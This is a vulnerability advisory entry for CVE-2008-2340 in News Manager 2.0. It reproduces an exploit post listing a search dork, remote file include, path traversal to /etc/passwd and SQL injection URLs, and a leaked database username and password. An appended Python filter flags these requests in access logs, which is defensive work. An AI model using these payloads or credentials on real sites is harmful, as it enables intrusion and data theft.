News Manager Multiple Remote Vulnerabilities

Vulnerability ID: 1115220 Vulnerability type: SQL injection
Published: 2008-05-15 Updated: 2008-09-05
CVE ID: CVE-2008-2340 CNNVD-ID: CNNVD-200805-251
Platform: PHP CVSS score: 7.5
|Vulnerability source
https://www.exploit-db.com/exploits/5624
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200805-251
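|Vulnerability details
News Manager 2.0 contains multiple SQL injection vulnerabilities. A remote attacker can execute arbitrary SQL commands via (1) the lang parameter to (a) advsearch.php, (b) archive.php, and (c) index.php, and via (2) the pid parameter to (d) list_tagitems.php.
|Exploit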
News Manager 2.0 Multiple Vulnerabilities
Script : http://superb-east.dl.sourceforge.net/sourceforge/newsrssmanager/newsmanager2.0.zip
Dork : "Copyrights © 2005 Belgische Federale Overheidsdiensten"
1- Remote File Include Vulnerability
/ch_readalso.php?read_xml_include=http://localhost/020.txt
2- Remote File Disclosure Vulnerability
/attachments.php?id=../../../../../../../../../../../../../etc/passwd
/login/attachments.php?id=
3- Remote SQL Injection Vulnerabilities
/list_tagitems.php?pid=-41[SQL]
/advsearch.php?lang='[SQL]
/archive.php?lang='[SQL]
/index.php?lang='[SQL]
4- Remote Permission Bypass Vulnerability
/db/connect_str.php
You Can Get Username Of db & Pass & Name .. As 
mysql||localhost||newsmanager||root||mahmood4li
5- You Can Get PHPINFO From 
/login/info.php
Thanx To : Tryag-Team & HaCkeR_EgY & InjEctOr5 TeaM & All Muslims HaCkeRs   :) 

# milw0rm.com [2008-05-15]
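
A defender's view of the request patterns listed above, as an added example that is not part of the original advisory: a Python filter that flags web-server access-log lines matching them. The combined log format, the sample lines, and the assumptions that `lang` is a short language code and `pid` an unsigned integer are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
LANG_OK = re.compile(r"[A-Za-z_-]{1,10}")  # assumption: lang is a short language code
PID_OK = re.compile(r"[0-9]+")             # assumption: pid is an unsigned integer

# (script, parameter) -> (label, predicate that is True for a suspicious value)
RULES = {
    ("ch_readalso.php", "read_xml_include"): ("remote-file-include", lambda v: "://" in v),
    ("attachments.php", "id"): ("path-traversal", lambda v: ".." in v or v.startswith("/")),
    ("list_tagitems.php", "pid"): ("sql-injection", lambda v: not PID_OK.fullmatch(v)),
}
for page in ("advsearch.php", "archive.php", "index.php"):
    RULES[(page, "lang")] = ("sql-injection", lambda v: not LANG_OK.fullmatch(v))

# Files the advisory reports as directly readable over HTTP.
EXPOSED = ("/db/connect_str.php", "/login/info.php")

def findings(log_line):
    """Return the sorted labels raised by one access-log line."""
    m = REQUEST.search(log_line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    hits = set()
    if url.path.endswith(EXPOSED):
        hits.add("sensitive-file-access")
    script = url.path.rsplit("/", 1)[-1]
    # parse_qs percent-decodes values, so encoded payloads are checked too.
    for name, values in parse_qs(url.query, keep_blank_values=True).items():
        label, suspicious = RULES.get((script, name), (None, None))
        if label and any(suspicious(v) for v in values):
            hits.add(label)
    return sorted(hits)

def scan(lines):
    return [(i, hits) for i, line in enumerate(lines) if (hits := findings(line))]

# Constructed sample log (documentation address 192.0.2.10); first line is benign.
SAMPLE_LOG = [f'192.0.2.10 - - [15/May/2008:10:00:00 +0000] "GET {t} HTTP/1.1" 200 512' for t in (
    "/index.php?lang=nl",
    "/index.php?lang=%27",
    "/list_tagitems.php?pid=-41",
    "/attachments.php?id=../../etc/passwd",
    "/ch_readalso.php?read_xml_include=http://localhost/020.txt",
    "/news/db/connect_str.php",
)]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

A hit on `sensitive-file-access` means the file was requested, not that it was served; check the response status alongside it.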
|References

Source: XF
Name: newsmanager-multiple-sql-injection(42461)
Link: http://xforce.iss.net/xforce/xfdb/42461
Source: BID
Name: 29251
Link: http://www.securityfocus.com/bid/29251
Source: MILW0RM
Name: 5624
Link: http://www.milw0rm.com/exploits/5624